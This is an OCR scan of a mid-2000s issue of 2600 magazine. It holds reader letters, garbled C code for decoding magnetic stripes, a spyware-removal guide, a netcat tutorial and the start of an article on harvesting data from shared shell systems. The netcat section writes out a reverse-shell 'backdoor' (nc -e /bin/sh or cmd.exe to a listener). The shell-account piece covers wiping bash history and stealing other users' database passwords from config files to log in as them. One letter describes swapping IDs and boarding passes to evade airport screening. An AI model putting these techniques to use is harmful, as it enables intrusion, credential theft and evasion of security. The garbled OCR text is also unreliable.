it by reflection), I thought I would mention it. Thanks for continuing t o put out a great mag for all these years! Martian

Cover Letters
Dear 2600: Love your magazine! It was recommended by the inwas taking. So I bought a structor a t a Microsoft class I was magazine and later subscribed. I j u s t received 21:4. I wondering about the pale image o f a face on the front cover. I don't really recognize the face, but Ican see it there on the upper right corner, among the trees. Whose face i s i t ? Why i s it there? anonymous Please allow us to ask the questions. Dear 2600: I see George Bush. All the time? Dear 2600: Well, I'm taking the cover of 21:4 literally and I'm saying something about what Isee. Isee Mr. George Bush's head i n the corner and I the black tombstone see below him. Isee the images of past 2600 magazine covers on the tombstones beside corporate logos and mascots, and the word "ERASE" on the tomb numbered especially for all of you. And don't think I overlooked the "SSSS" which will get you searched before getting on an airplane. One of the reasons ILove 2600is because of the creative (and more often than not cryptic) cover which accompanies every issue. Keep up t h e great work! Fa ber Dear 2600: Following t h e advice on t h e cover of your new issue ("if you see something, say something"), I noticed the uh ... ghostlike image of Gee Dubbya over the graveyard. Very nice touch. I'm not completely sure what it's supposed to mean, but it's cool. As for your magazine, keep doing what you're doing because it kicks ass. john2kx

Dear 2600: I have been a long time fan o f your magazine. Howbelieve that politics needs t o be left out. I t o like ever, I read and be informed o f technical issues and I know people from New York loathe Bush because, let's face it, he i s a Republican. New York is not known for their support o f Republicans and Iunderstand you are pissed off that he won and need t o vent. But please do not do it i n this magazine. Iknow you think it is cute t o put Bush on the cover and whatever but Icannot go anywhere without hearing about politics. It is over and I suggestthe people am get over it. Yes Iagree with rights, I an anti-federalist, and I believe i n state rights. I n o t believe Bush is do ZbOO


Dear 2600: So I just picked up the Latest copy of 2600and as always I couldn't wait until I was i n the privacy of my office with the door shut (to avoid any suspicious onlookers) t o still felt uptight as crack open the first page. Somehow I \though someone was watching over my every move as I


6 warmonger and I do not believe t h a t terrorists should
be sent into a court like we should. With t h a t said, I agree t h a t U.S. citizens should not be subjected t o random searches of their houses without their knowledge and Americans should not be held without trial, lawyer, and so forth. You have my support 100 percent on that. However, i f we capture terrorists or someone who we suspect is a terrorist (who is not an American), then I don't care i f they don't have n'ghts, because they don't! The Geneva Convention does not grant them this right at all. As far as torturing them, i f i t saves our troops' lives, go for i t . We did not start this war and our soldiers should not die because we are t o o afraid t o let them go without sleep because a bunch of left wing nut jobs are protesting them t o regain their lost power. I know most "hackers" are really left wing and are almost communist. Granted, I cannot group all of them in t h e same category since I believe my stance is right wing even though Bush is t h e first Republican president I have voted for. Making people aware of their rights is one thing, telling them they are losing them is OK, but t o blame i t on one man is a joke. It is both parties' fault that we have our rights degraded as far as they are now (Lincoln started this with t h e backing of a strong federal government). But it's even more t h e fault of t h e American peopte because they have let i t slip this far. I f you ever watch Jay Leno's jay-walking or Sean Hannity's man on t h e street quiz, t h e majority of people my age and younger (23) have no clue who t h e vice president is or what t h e amendments are. Let alone t h e Bill of Rights! I know I have turned this into a political rambling and I am sorry but I beg of you, please, no more. Talk about rights, talk about how they are being taken away, but be as partial as you can. I cannot take anymore "Left hates America, Right are fascists taking our rights away" propaganda. Rage1605 Nice j o b keeping politics out. Or did you mean for us t o stop talking about these issues afteryou talked about them? First off, we discuss a l o t o f things and the space taken up by this kind o f a topic has always been fairly minimal. Second, i f it's something that's on people's minds, then why should we deny them the right t o express themselves? Like anything else, hackers have interesting perspedives on these issues. Plus, it's generally a good thing t o express yourself and expose yourself t o other opinions. Having been exposed t o your opinions, we cannot react with silence. You believe it's acceptable t o abduct people from foreign countries and torture them? We hope you realize that there are many people throughout the world who have the desire and would have the right to do the same t o you underyour own logic. I f that's the worldyou want t o live in, you're well on the way towards gem'ng there. You say we didn't start this war? We invaded a country that never attacked us and had neither plans nor ability t o do so. Regardless o f what kind o f society we manage t o create over there, you can never escape that fact. You obviously have all kinds o f problems with whatyou imagine t o be the "left wing." But these issues are o f concern for people o f all political bents. Hackers come from all kinds o f different political backgrounds and ideologies so please don't assume that they all believe the same thing. One thing that most would probably agree upon is that expressing something that's

on your mind is a good thing. We're g l a d y o u opportunityand hope you understand w h y we'll t o give others t h e chance.

Dear 2600: I n case you haven't heard, t h e company ChoicePoint has been selling personal data (Social Security numbers, phone numbers, addresses, etc.) t o companies. Someone created a fake company and ordered i n f o on 145,000 people and so far 50 suspicious credit accounts have been created i n t h e names of people w h o have had their identity stolen. This is beyond wrong. T h e criminalin this case is ChoicePoint! ChoicePoint and every company like them should be shut down! I f t h e U.S. government refuses t o do something about these companies I hope someone else does. Phreakinphun Dear 2600: I just wanna say all t h e usual "I love your magazine" stuff before I say what I have t o say. I d o love i t and I've been reading i t for two years now. This weekend I went t o pick up 21:4 and almost had a canary i n t h e magazine shop when i t w a s $15 Canadian! I thought for sure i t was a mistake and asked t h e lady i f she accidentally put t h e wrong price o n t h e magazine. She replied t h a t she hadn't and t h a t i t was now $15 everywhere. I couldn't believe i t - I almost died. I literally sat i n t h a t magazine shop and deliberated o v e r i t for 20 minutes. Was i t worth i t or not? Of course i t is. But i f I have t o pay more, I would like t o voice some concerns. First off, I just have t o say t h a t close t o a 50 percent price hike is a huge price hike and I have a feeling t h a t i t may deter a lot of readers. How have you handled t h e price hike with t h e subscribers? Secondly, I felt completely ripped o f f when I read about 50 percent of t h e letters (my f a v o r i t e part of your magazine) were written by teenyboppers who are planning a DOS attacks on their school networks. I mean who are these kids and why do you keep publishing these letters? I think we need t o get over t h e w h o l e idea of "what makes a hacker" letters. I mean either you get i t or you don't. My suggestion: have a page t h a t defines "hacker" as you see f i t . but please don't f i l l up t h e letters pages with them anymore. Please. I don't mean t o rip on you completely and of course there is still usefulinfo. I just feel Like I have t o dig a bit more t o find i t than I used to. andehlu Whoever sold you t h a t magazine r i p p e d you o f f Our price in Canada has n o t increased f o r some time. Our price is $8.15 i n Canadian dollars ( w h i c h would make such an increase closer t o 100 percent than t o 5 0 percent). We suspect someone covered t h e "8" and convinced you that i t was 1 5 dollars. It's either incredibly sleazy or incredibly stupid. Either way, march back there and demand a refund. Dear 2600: I am saddened by t h e current s t a t e of affairs in this country. To begin with, I recently read a survey i n which a majority of high school students did n o t know what t h e First Amendment of t h e Constitution provided. When read t h e exact text of t h e First Amendment, more than


6 n e third of the students felt it went "too far" i n the rights it provided. Furthermore, only half of the students surveyed felt that newspapers should be allowed t o publish freely without government approval. Three quarters of students polled said that flag burning was illegal and about half of them said that the government had the authority t o restrict indecent material on the Internet. This almost makes me cry! We Live i n a country where the Leader has publicly stated t h a t he would prefer a dictatorship, where blatant election fraud has occurred i n the form of unverifiable ballots, where t h e common public thinks that asking questions about government actions is unpatriotic, and now, t h e future of the country thinks that we have too many freedoms. I urge everyone who reads 2600, anyone who believes t h a t information should be free and that speech is free, t o speak up and speak out against this tide of complacency. It is our responsibility t o be critical of our government. I f we do not act, the fiction of 1984 w i l l become our reality. Alop I n a l l fairness, we don't believe Bush was actually wishing for a dictatorship b u t simply attempting to make one o f those points o f his that never really took off. But your warnings are definitely right on target. Being aware and awake are essential for the future.

\ Complaints to the store manager usually are enough to resolve the situation. I f this doesn't work, l e t us know the specifics.

Dear 2600: I attended a 2600 meeting for the first time at the Barnes and Noble i n the Baltimore Harbor. I disapam pointed t o find out what goes on. When Ishowed up I was told that nothing really goes on buttalking between others who show up. This i n no way constitutes a meeting. Instead, it's a live chat room you feel awkward joining. I was under the assumption that everyone was able t o attend a 2600 meeting but I never plan t o read another 2600 article or attend another 2600 meeting again. After getting the cold shoulder from all a t the meeting and no response from the webmaster of the Maryland 2600 meeting site (who is not keeping it updated), I now writing t o you t o please step i n and do am something about this chapter of lame so-called hackers i n Maryland. "Yan Since you're never going to read us again, there's really no way we can address your concerns to you. But it should be understood that these are n o t meetings with lectures and agendas b u t gatherings where everyone is free to converse with whomever they choose i n a public area. We're sorry ifyou're n o t comfortable being a part o f this b u t that's how it is. We encourage all who attend to be open to newcomers and n o t form cliques. And newcomers should avoidjumping to conclusions. Dear 2600: Ihave been purchasing your magazine (when Ican find i t ) for the last four or five years and want t o let you know that Ifound it, but not without some digging. It seems that Barnes and Noble carries your fine publication but chooses t o keep it hidden away i n a drawer. After searching for a minute ( I don't have a l o t of patience), Iasked the cashier where it was. She showed me and didn't give me a reason as t o why it is hidden awav. Chris This is n o t Barnes and Noble policy b u t rather that o f the local store or even o f that particular person.

Dear 2600: I was on vacation recently i n Michigan t o see some friends. While there, I stayed a t both a Baymont I n n and a Days Inn. While a t the Baymont Inn, I had good unrestricted wireless access. No one tried t o censor all the porn or hacking sites I visited and downloaded from. Not a problem. Ihighly recommend them. About halfway through my trip, Imoved over t o a nearby Days I n n due t o price range considerations. While a t the Days I n n I had relatively good cable access and I was satisfied. Towards the end of my stay, I was abruptly cut off i n the middle o f a download from astalavista.com. Ithought the site was down and Icontinued surfing, noting as time went on that Icontinually received time out messages from them. Eventually when I got t h e same message from 2600.com and a number of other sites, I realized it had been blocked by whatever server they were using t o manage connections at the hotel. This was annoying but Iwas willing t o Let bygones be bygones. I connected t o a proxy and was happily downloading for about two hours before the admin cut o f f access t o my proxy. Well, needless t o say, this pissed me o f f t o no end. I switched off t h e proxy and wrote their corporate headquarters a nasty note stating that I would never patronize any establishment of theirs again and that Iwould highly recommend all my friends find other accommodations unLess drastic action was taken and I was given an apology. To date I've received neither a reply nor an acknowledgment. So this is me recommending to all the happy hackers out there not t o ever visit Days Inn. Jon The one thing you didn't tell us was what excuse they gave for cutting you off. Did they specifically state that they were monitoring what you were downloading? This doesn't make a great deal o f sense.



Dear 2600: I wish I had been introduced t o this magazine sooner than a year ago. I was actually pretty surprised when I found out that a store i n t h e East Boonies of Maine carried it and, ever since, I've been obliged t o pick it up. Naturally, when I had an interesting thought about America's newest catch phrase, 2600 was the first place I thought of sending it. So here it is: Freedom isn't free. Iknow this motto has been circulating around the country for a t Least a few years now, i n hopes that people w i l l realize a sacrifice has t o be made t o preserve freedom. But i s this a l l the slogan really means? Freedom isn't free could mean something completely unintended. If we stop thinking i n terms of cost, t h e saying becomes more of a slogan for the trends i n the U.S. as I understand them. Freedom isn't free, man, it's i n prison. Or a t least headed that way. Do you seethe subtle transition there? With a different connotation, a very popular saying for the defense o f the government's actions overseas becomes a slogan fit for the posters of Big Brother's Oceania. Freedom isn't free, not completely, not yet. I'm just glad t h a t there are people out there, you and others, who are working i n its defense.


Thank you for trying t o educate the masses. Little more than a year ago, I one of them. was Tommy You most definitely have a future i n mass marketing.

Fighting Back
Dear 2600: I'm typing this a t 36,000 feet after reading the recent article on identification and airline security. As a frequent business traveler, old hacker, and semi-anarchist, I've had plenty of time t o experiment with airline security and identity documents i n both air travel and general use. First off, I almost never use any sort of I D document and on the rare occasion that I it's nearly always a do, "fake" one. I "fake" because I say make it a point of using have created myself, but that contains realinfo. ID that I Why? To prove the point that fake documents will fly (no pun intended), but without exposure t o persecution for having false documents. There is nothing illegal i n this. Actually, possession or use of false documents itself is generally not illegal, but using them for fraudulent purposes is. I encourage everyone t o refuse t o use ID for everyday things. Simply refuse it, or say you don't have it, or whatever. I n many, many years of doing this, it has never stopped me from doing what I want. When asked i f I have ID for a credit card purchase, for example, Isimply say "no." Sometimes Iget a deer-in-headlights look, sometimes a question or two, but never has someone refused my purchase! Remember that you can't be forced t o give ID t o the police i f you're not driving a vehicle. A recent Supreme Court case has been touted as changing that, but it does not. The recent decision merely says that you must identify yourself during an investigation, but does not say you must show identification documents. Ihave used this a number of times during civil disobedience activities with 100 percent success (meaning I've never been arrested for it). Ihave had cops literally spith'ng on me through anger a t my refusal t o provide anything more than my name, but they knew better than t o arrest me for such a non-crime. You must also refuse t o give your birth date and Social Security number, as either of those items will serve t o fully identify you with a computer search, and void the purpose of refusing t o show ID documents. When flying, Itry t o have fun with the security goons. On many flights Iuse an expired ID. Most of the time they don't notice this, but often they will and "select" me for specialinspection. As most of you know, this means putting four "S" symbols on my boarding pass and then doing +hand search of my laptop case and body. The ludicrousness of this should be obvious; the terrorists we are supposedly trying t o stop all had proper, current, and valid U.S. I D documents! And why does expired ID matter? Does it stop being me on the day that it expires? There can be no valid security reason t o require a current ID versus an expired one. The hand search implies another thing t o me; they obviously must know that the X-ray and metal detector screenings are insufficient t o assure security. I mean, if they are effective, then why the special screening? That ,or the motive for the special screening is t o punish

people for not having "proper" I D or n o t conforming t o visual or behavioral expectations. And explain t o me why a terrorist would do something that everyone knows will get you a special screening, such as buying a one-way ticket, flying standby, or buying a t t h e last minute? I mean, do we really think that someone who intends t o blow himself up would be concerned w i t h t h e added cost of a round trip ticket? Or that they'd p l a n it a t the last minute and not buy a ticket i n advance? Often I use one of my handmade I D documents, will and never have had one questioned. Some are purposely not-so-good creations, but they never get questioned. I'm thinking a six year old's crayon rendition o f a driver's license would be good enough for these minimum wage workers. Most of the time they don't look closely enough t o detect something obvious. When traveling with others, Iusually talk them into switching I D and boarding passes with me. The security people have never noticed this. For the most part they just want t o match the name on the boarding pass with the ID. I f t h e y did notice, we'd simply explain that we got them mixed u p when picking them up from the ticket counter. Now let's talk about the matter o f t h e Scarlet Letter on the boarding pass t o signify people who are selected for "random" special inspections. One thing should be real obvious here; it's just a piece of paper. A boarding pass, which Iprinted on my own computer. To be more clear, one copy of the boarding pass. A l l you need is a second copy without the symbols, and t h e security people won't know how "special" you are. Of course, it's probably illegal t o do this, so I'm n o t admitfing t o ever having tried it nor encouraging you to. But if you were to, say, print two copies just for safety, and then forget and pull out the "wrong" one, I think it would be pretty tough t o prosecute you. Identity documents i n general a r e pretty useless right now since they are easily faked, b u t unless we fight back, there will come a time when they are demanded for anything you do. Eventually there w i l l be systems i n place for nearly anyone t o check your document against a database, and of course, they will l o g t h a t "for system security." Meaning, a trail of your movements and activities w i l l be generated. Already i n my home state the bars can subscribe t o a service which will read and verify the data on the magnetic strip on a driver's license. How long before you have t o authenticate yourself t o use the library, public wifi, buses/trains/airplanes, or anything else? Refuse t o use ID as often as possible, while you still can. "Principio obstate." (Resist from t h e beginning.) saynotoid@gmail.com Thanks for the words o f wisdom. It's always a goo0 idea to challenge whatever system i s being crammeci down our throats b u t i n such a way as t o n o t putyourselr a t risk unnecessarily. We j u s t wonder how long such things will still be possible.


to letters@26OO.com or use snail mail: 2600 Letters, PO Box 99, Middle Island, NY 11953 USA.

4' 5

i n e -^


int i; short int max = 0;


pauses until the dsp level is above the silence threshold file descriptor to read from [silence-thresl silence threshold ' 1 yiE:lence-pau.e(int fd, int s i l e n r ~ t h n s ) short int buf = 0; while (buf < silence-three) (

1 '


1 loop while silent +I '
1. read from fd ' 1


xreadlfd, Lbuf, sizeof (short int));

I* absolute value


get8 a sample, terminating when the input goes below the eilence threshold [fdl file descriptor to read from [sample-rate] sample rate of device [sllence_thres]silence threshold '* global f * [sampleI sample [sample_sire] n d e r of frames in sample * I void get-dsp(int fd, ~ n t sample-rate, int silence-thres) int count = 0, eos = 0, i; short buf; sample-size = 0; silence-pause(fd, ailence_thresl; while (leos) (
I * wait for sample * I / * fill buffer

1 '


sample = xrealloc(sample, sizeof (short int) for (i = 0; i < BUF-SIZE; it+) ( xread(fd, Lbuf, sizeof (short int)); sample[l + (count BUF-SIZE)] = buf; COUnttt; sample-sire



(count + 1)));



eos = 1; 1. check for silence . I if (sample-sire > (sample-rate END-LENGTH) 1 1000) { for (I = 0: i < (sample-rate ' END-LENGTH) / 1000; i++) { b ~ f 8amplellCOUnt * BUF-SIZE) = I]; if (b"f < 0) b"f = -buf; if (buf > silence-thres) eoa = 0:


1 else eos = 0;


Open the file [fdl file to open [verbose] verbosity f a lg global r * [sample_size]number of frames in the file * I SNDFILE *sndhle_init(int fd, int verbose)


SNDFILE .snd6le; SF-INFO sfinfo: memset(Lafinfo, 0, sizwf(sfinfo)l;

I* clear sfinfa structure


sndhle = sf_open_fd(fd. SFM-READ, Safinfo, 0); I* set endfile from Ed * I if (sndhle == Null) ( fprintf(stderr, "**+ Error: sf-open_fd() failed\n"); enit(EXIT_FAILURE); 1 if [verbose) { I' print some statistics * I fprintf(stderr,t. ." Input file format:\"" ' Frames: %i\n" " sample Rate: %i\n" ' Channels: %i\"" ' Format: Ox%OBx\n" " Sections: %i\n" " Seekable: %i\n', (int)sfinfo.frames, sfinfo.samplerate, 8finfo.channels. sfinfo.fonnat, sfinfo.sections, sfinfo.seekable);



if (sfinfo.channels I= 1) { I* ensure that the file is mono fprintf(stderr, Error: Only monaural files are supported\n"); exit(ExIT_FAILuRE);



s m p l ~ s i z e sMfo.frms; = retnrn andrile;

/ * set sample eize fl



P a g e


* * global **


SNDFILE pointer from sf-open() or sf-open-fd()

[samplel sample [sample_aizel number of frames in sample * / sf-count_t count; sample = xmalloc(sizeof(sh0rt int)

* sample_size); I' allocate memory


covnt = sf-read-short(and5le. sample, sample-size); / r read in sample * I if (count I = sample-size) { fprintf(etderr, ''*- Warning: expected 6i frames, reed %i.\n", sample_8ire, (rnt)count); sample-size = count;

I * decodes aiken biphase and prints binary [frepthres] freqvency threshold * * global *' [sample] sample [sample_sizel n d e r of frames in sample * I void decode_aiken_biphase(int frecthres, ~ n t silence-thres)

z n t i = 0, peak = 0, ppeak = 0; ~ n t *peaks = NULL, peaks-size = 0; int zerobl;

for (i = 0; i c sample_size; i++) if (sample[il < 0) sample[il = -sample[i];

I * absolute value * I



i = 0; I* store peak differences ' 1 while (i c sample-sire) { ppeak = peak; I* old peak value '/ while (sample[il i silence-thres 6 s i c sample-size) / * find peaks ' 1 = it+; peak = 0; while (sample[il > silence-thres 6 6 i < sample_size) ( if (samplel~l> sample(peak1) peak = i; (peak-ppeako) ( peaks xrealloc(peaks, aizeof(int) peaks[peaks_size] = peak - ppeak; peaks-$l=e++;



(peaks-sire + 111;

I* decode aiken biphase allowing for frequency deviation based on frecthres * I /.~gnorefirst two peaks and last peak '/
zerobl = oeaksl21: . . for (i = 2; L < peaks-size 1; i++) { if Ipeaks[iI < (lzerobl / 2) + (frepthres (zerobl 1 2) 1 100)) h b peaks[il > ((zerobl / 2) (freq-thres * (zerobl / 2) 1 100))) ( if (peaksli + 11 < ((zerobl I 2) + (frecthres (zerobl / 2) / 100)) 6s peaksli + 11 r ((rerobl I 2 1 (freq-thres * (zerobl I 2) 1 100))) ( printf("1"); zerobl = peaks[i] * 2;





else if (peaks[il c (zerobl + (frepthres zerobl / 100)) 66 peaks[il > (zerobl (fre~thres zerobl / 100))) ( * printf(*O"); Xifndef DISABLE-VC zerobl = peaks[il; #endif





I * main +I int main(int srgc, char *argv[])

int fd; SNDFILE "endfile = NULL; / + codquration variables e l char *filename = NULL; int auto-thles = ?.UTO-T11El, Y-level = 0, ~ 6 ~ s n d 5 l e0. Verbase = ~nt sample-rate = SAMPLE-RAW, silence-thres = SILENCE-TARES;



I* getopt variables f / int ch, option-index; static struct option long-options[] = ( ("auto-thres', 0, 0. ' a ' ) , ("device", 1, 0 , ' d m } , {"file", 1, 0, '£'I, ("helo". 0. 0. ' h ' ) .
("silent", ("threshold', ("version", 0, 0, ' s ' } , I , 0, 't'}, 0. 0. ' v ' l ,

/. process command line arguments +I while (1) (

/ if (eh



break; switch (Ch) ( case ' a ' : I * auto-thres * I auto-thres = atoi(optarg); break; case 'd': I + device . I filename = xstrdup(optsrg); break; case 'f': I * file ./ filename = nstzdup(optarg); uae-sndfile = 1; break; case 'h': / * help * / print-help(stdout, argv(0l); exit(Ex1T~succEss); break; case 'm': I' max-level f / maxlevel = 1; break; case ' 6 ' : I' silent * I verbose = 0; break; case 't': I * threshold +I auto-thres = 0; silence-three = atoi(optarg); break; case ' v ' : I* version * I print-version(stdout); exit(EX1T-SUCCESS); break; default: I* default +I print-help(stderr, argv[Oll; exit(EXIT_FAILURE); break;


if (verbose) 1 print_version(stderr); fprintf(stderr, ''\"''I;

I * print version +I

if (use-sndfile && ma%-level) ( I* sanity check * I fprintflstderr, "*+' Error: -f and -m switches do not mixl\n"); exit(EX1T-FAILURE);

~f (filename == NULL) filename = xstrdup(DN1CE);

I * set default if no device is specified


if (verbose) I* open device for reading * I fprintf(stderr, ' ' W * Opening Es\n", filename); fd = open(fi1ename. 0-RDONLY); if (fd == -1) { perroc( "open() " 1 ; exlt(EX1T-FAILURE);

~f (use-sndfile) I* open endfile or set device parameters ' I sndGle = sndGle_init(fd, verbose); else sample-rate = dsp-initlfd, verbose); if (max-level) ( print-max-level(fd, sample-rate); exit(EXIT_SUCCESS);

I. show user maximum dsp level +I

if (!silence_thres) ( I * silence-thres sanity check + I fprintf(stderr, "*" Error: Invalid silence threshold\n"); exit(EXIT_FAILURE);

if (use-sndfile) f t read sample ' 1 get_sndfile(sndfile); else 9etLdsPlfd5 sample-rate, silence-thres); if (auto-thees) silence-thres


I * automatically set threshold ./ evaluate_max() I 100;

if (verbose) I +print silence threshold * I fprintf(stderr, " * * + Silence threshold: %d (%d%$ of max)\n", silence-thres, auto-tnres);

silence-thres); I * decode aiken biphase
I ^ close file * I I * free memory ' I



\ s p r i n g





by LoungeTab LoungeTab@hotrnail.com This is an article i n response t o "Scumware, Spyware, Adware, Sneakware" i n 21:2. First I would like t o commend shinohara on writing a great article about the nastiest of nasties. One thing I noticed was where he said MSCONFIG was available i n allversions o f Microsoft since 98. Actually, MSCONFIG isn't included with any installation options of Win 2k, but any version o f MSCONFIG will work under Win 2k. Irecommend the XP version which i s available at http://downloads.thetechguide.corn/msconfig.zip. Ithought I would also add my own process for eradicating a l l types of scumware. Are y o u Infected? First, how do you know i f you are infected with scumware? I f any o f the following sound familiar: A gangload o f popups, even when not connected t o the Internet, Internet Explorer toolbars (95 percent are scumware), Homepage Hijacking (inability t o change homepage), Internet activity from modem when no Internet applications are running, Numerous processes running that have seemingly random names, A process that has "XxX" or "teen" in its name (quit looking a t so much porn), Serious decay in system speed, then more than likely you are infected with scumware. What t o do next? Let's get rid of it. All of it. Removal The following instructions are for users of a l l versions of Windows. First you have t o download, install, and update these programs. It is extremely important for you t o manually update these programs because some of them do not have the latest definitions when you download them. CWShredder http://www.majorgeeks.com/down wload4086. html Spybot S&D http://www.safer-networking.org/ w en/download/index. html

Adaware SE http://www.majorgeeks.co~n/down ~load506.html SpySweeper http://www. webroot.com/wb/down -loads/index,php HijackThis http//www.spychecker.com/program ,/hijackthis. html Now go ahead and restart your computer into Safe Mode (hit F8 before the Windows splash screen comes up). After your computer has booted i n t o safe mode you will want t o first run CWShredder. After launching, select "Fix" and it will search for and remove any CoolWebSearch programs. CoolWebSearch likes t o change many Internet Explorer settings, adding their own websites t o trusted sites, changing your search preferences and homepages, and redirecting you t o their sites whenever you mistype a URL. CWShredder should take less than a minute to run. Next on the list i s Spybot S&D. Run this nifty little program and it will scan the registry and files for occurrences of scumware. Select "Search and Destroy" from the menu on the left and then scan on the screen it brings up. This program will take about 5-10 minutes t o run. After that is done, run Adaware SE. For this program select smart system scan. This program also searches through the registry and folders for scumware programs. This scan can take anywhere from 10 minutes t o 2 hours. The final file searching program, SpySweeper, i s one of the best programs available i n my opinion and it would be worth it t o purchase the f u l l version. This program does an in-depth scan o f a l l files, folders, and registry entries and removes from them a l l the leftovers that the previous programs didn't catch. From the main menu select "Sweep Now" and then "Start." After the scan is complete you will be prompted for which files you want t o be quarantined. This scan i s similar t o Adaware and can take anywhere from 20 minutes t o 4 hours. Finally, run HijackThis a t the menu select Scan and it will display a complete list of BHOs, Internet Explorer Toolbars, Startup items, and extra buttons added t o Internet Explorer. Be sure you understand what each entry i s before you remove it! You may want t o keep many of these entries.


Kazaa Did you ever have Kazaa installed on your computer? I f so, go t o http://www.spychecker -.com/program/kazaagone.html and download KazaaBegone t o eliminate a l l traces of Kazaa along with the bundled software that came with it. I n t e r n e t Explorer Sick of Internet Explorer? Can't figure out how t o completely remove it from your system? Download IEeradicator from http://www.litepc.com/ -ieradicator.html t o completely remove it from

your computer. Be sure t o read t h e documental tion because it won't work with Win XP or Win 2k sr2. Summary Your computer should now r u n much faster since you freed up a l o t o f processing power from processes that were absolutely worthless. At this point I usually remove a l l t h e applications except Spysweeper and always let it r u n i n t h e background t o notify you of any changes t h a t are made t o your Internet Explorer f i l e s and startup files.

by DJ Williams The following article is a continuation t o MobiusRenoire1s original submission i n 21:2 "Fun With Netcat." Netcat (nc), created by Hobbit, is known as the "Swiss army knife" of security/hacking tools. This is most likely due t o the tool's extensive features and capabilities. Before we explore some additional uses o f netcat, you are advised t o get written permission before executing any o f these examples on systems you do not own. Sure, you may be saying "screw that" yet even on work systems, employees have been fired for running tools without permission. As described i n the 21:2 article, netcat used with basic options nc [host] [port] allows TCP/UDP (-u) connections on a selected port t o perform a variety o f tasks. The focus of this article i s t o explore additional uses, so let's take a look a t some more examples. Web Server (banner) Discovery Most web servers are configured by default t o reveal the type and version, which may be helpful t o an attacker. Wait ... Iknow some o f you are saying Ichanged my banners t o obfuscate the web server (i.e., RemoveServerHeader feature i n the URLScan security t o o l t o mask IIS web servers). The point here i s that someone could have changed the banner and you may want t o validate the output with an alternate t o o l such as net-square's HllPrint (www.net-square.com/ *httprint/). With that said, let's look how web server discovery can be accomplished. First we need t o establish a connection t o the target web server on the default H l l P port.

ning i n very verbose mode, followed by t h e target, which can be a domain or IP, a n d t h e default web server port (80). Once netcat connects, you must type i n an H l l P directive such as:
HEAD / HTTP/I. o <en terz <en t e n

The reply should indicate w h a t type o f web server i s running. You can substitute t h e HEAD directive for the OPTIONS directive t o Learn more about the web server. An example o f t h e output is listed below.
nc -w 80 www.example.com [] -open HEAD / HTTP/I.O 80 (http)

HTTP/l 1 302 Found Date: Sun, 22 Aug 2004 18:09:21 GMT Server: Stronghold/2.4.2 Apache/l.3.6 *CZNetEU/2412 (Unix) mod-fastcgi/2.2. 12 Location: http://www.example.com/index. Connection: close Content-Type: text/html; charset=iso-8859-1


Port Scanning As a fast alternative t o Fydor's nrnap (www.in -secure.org/nmap/), the king o f p o r t scanners, netcat can be used. I s this t h e best choice? I am sure it is not, yet the purpose o f t h i s article is t o demonstrate netcat's abilities. Let's take a look a t t h e syntax t o use netcat as a p o r t scanner.
nc -v -r -w3


nc -vv target 80

target portl-portn

The -w option indicates that netcat i s run2005

The -v option indicates t h a t netcat i s running
P a g e




verbose mode, the -r is t o randomly select ports from provided list, the -w i s the wait time i n seconds, and the -z option prevents sending data t o the TCP connection. The target can be a domain or I P and the port list follows (use a space t o separate). An example of a TCP port scan (on a 'nix sewer) is listed below. Note: for UDP add the -u option and associated ports.
nc -v -2 -r -w3 20-21 23 80b445 /sort -k 3b www.example.com [] 21 open www.example.com [] 23 open www.example.com [] 80 open www.example.com [ 443 open

mised system. Two examples are listed below.


Target Machine
, C

-e path-to-program [host] [port]

The -e i s the program t o execute once a connection i s established. ~ h , following is *nix sty{e: a
nc - /bin/sh ,
0. 69 2112

The following i s a Windows style:
nc.exe -e cmd.exe

Attack Machine
nc -vv -1 -p port

FTP Yes, you read it right, netcat can be used as a crude FTP tool. First you will need netcat installed on both machines. I tested both a binary and text transfer. They both worked fine. Note: for best results, make sure the sender has a small delay (-w); the receiver does not require a delay. Go ahead and t r y it out! An example of the output i s listed below.

The -w option indicates t h a t netcat i s running i n very verbose mode; -1 listen mode for incoming connections; -p port number. Start a listener, pick a port allowed through t h e firewall: nc -vv -1 -P 2112
listenins on [any1 2112 connect to [10.10.l0.691 from www.exam bple.com [lo.10.10.691 548 M~CI-OSO~~ Windows 2000 [Version 5.00.21951 (c) Copyright 1985-2000 Microsoft corp. C:\inetpub\scriptsz

- ..

nc -w3 host port c file

The -w wait time i n seconds; host/IP of receiver; < redirect file i n
nc -w3 nc -w3 2112 < help.txt 2112 < Sample.jpy

nc -1 -p port > file

Note, you may need t o h i t enter a few times ... and bang, you have a shell prompt on the remote system.

Final Words

The -l listen mode for incoming connections; p port number; > rediredto file
nc -1 -p 2112 > help.txt nc -1 -p 2112 7 Sample.jpg


I n closing, we have seen the power of the netcat tool. You are encouraged t o test i t s abilities on your local system ( as it will work. For more information, check out the following links:

Shovel the Shell
To wrap up, I have included the most interesting use of netcat, i n my humble opinion. Here we will be using netcat t o shovel the shell (command prompt) from one machine t o another. This has been used and most likely is i n use right now, where one can acquire a backdoor into a compro-


'cat-hobbit-as~ (used as a reference) htt~://www.securityfocus.com/tools/137 ,(download site) Shout Outs: REL, DM, JM, KW, SW, and PF (the band).

The VCDs f r o m
a r e now


They consist of all of the talks which took place i n the two main tracks of the conference, which occurred i n July 2004. There are 78 discs i n total! We can't possibly fit all of the titles here but we can tell you that you can get them for $5 each or $200 for the lot. Much more info can be found on our website (www.2600.com) where you can also download all of the audio from the conference. I f you want to buy any of the VCDs, you can send a check or money order to 2600, PO Box 752, Middle Island, NY 11953 USA or buy them credit card a t store.2600.com.



by st4r-runner Having a shell account on a shared system is convenient, fun, and dangerous. A l o t of webhosting services provide shell access and some ISPs offer shell accounts on their Linux/Unix boxes. I f you're Lucky enough t o have one you should be aware of the potential for information leakage and protect yourself on these systems. Let's demonstrate how t o harvest some info. First, prepare your environment t o avoid leaving a telltale trail:
rm -/.bash-history

for storing sensitive information i n those directories. They think t h a t j u s t because t h e y don't provide a link for t h a t file or directory on their little web page means that no can get t o it. Users will put things like "bank-info.xls" o r "pic-of-wife-noone-should-see.jpgM or "myfavband.mp3". What else could we do? Let's see. Ah, t h e user i s running PHP-Nuke or some other php/mysql based portal and they have a nice config-php file.
1s -1 /home/usernme/www/*.php

In -s /dev/null -/.bash-history

You'd be surprised a t how many users make their database password the same as their login password t o t h a t system.
vi /home/username/www/contig.php

I f it's not a bash shell then do the same for the .sh-history or whatever t h e case may be. Now let's see what we have for user directories:
Is -a1 /home

Hmm dbuname=username a n d dbpass=mysecretpw. OK. So now I own their database. But I wonder if they would be dumb enough t o have that same password for this system.
ssh -1 username localhost


You'll probably get permission denied. No problem:
cat /etc/passwd

should show you a l l the user directories anyway. What's i n their directories? Hopefully
Is -a1 /home/username

